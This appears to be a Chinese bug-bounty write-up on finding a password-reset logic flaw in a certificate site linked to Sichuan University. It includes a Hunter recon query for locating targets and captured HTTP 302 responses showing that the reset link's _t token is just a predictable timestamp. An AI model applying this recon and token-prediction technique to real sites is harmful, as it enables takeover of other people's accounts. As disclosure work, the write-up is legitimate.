2024年2月16日23:13:57评论14 views字数 1977阅读6分35秒阅读模式

一眼定睛

教育edusrc-证书站挖掘-逻辑漏洞篇

没错,就是他了

重生之鹰图语法:

icp.name="四川大学"

&&web.body="注册"

&&web.body="登录"

很快哈,一眼定睛个系统

教育edusrc-证书站挖掘-逻辑漏洞篇

注册好一个用户后,来到忘记密码功能

教育edusrc-证书站挖掘-逻辑漏洞篇

这里先输入正确的验证码,然后下一步进行抓包

教育edusrc-证书站挖掘-逻辑漏洞篇

抓取响应包

教育edusrc-证书站挖掘-逻辑漏洞篇

这里的302跳转到重置密码是依靠Location:

/index.php?&m=User&a=resetPwd&_t=1705471852&mobile=1881924****
参数中的_t来认证
经过多次尝试发现:

HTTP/1.1 302 Moved TemporarilyServer: *Date: Wed, 17 Jan 2024 06:10:52 GMTContent-Type: text/html; charset=utf-8Connection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheLocation:/index.php?&m=User&a=resetPwd&_t=1705471852&mobile=1881924****HTTP/1.1 302 Moved TemporarilyServer: *Date: Wed, 17 Jan 2024 05:10:12 GMTContent-Type: text/html; charset=utf-8Connection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheLocation:/index.php?&m=User&a=resetPwd&_t=1705468212&mobile=1881924****Vary: Accept-EncodingContent-Length: 0HTTP/1.1 302 Moved TemporarilyServer: *Date: Wed, 17 Jan 2024 05:23:51 GMTContent-Type: text/html; charset=utf-8Connection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheLocation:/index.php?&m=User&a=resetPwd&_t=1705469031&mobile=1881924****Vary: Accept-EncodingContent-Length: 0HTTP/1.1 302 Moved TemporarilyServer: *Date: Wed, 17 Jan 2024 05:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheLocation:/index.php?&m=User&a=resetPwd&_t=1705469619&mobile=1881924****Vary: Accept-EncodingContent-Length: 0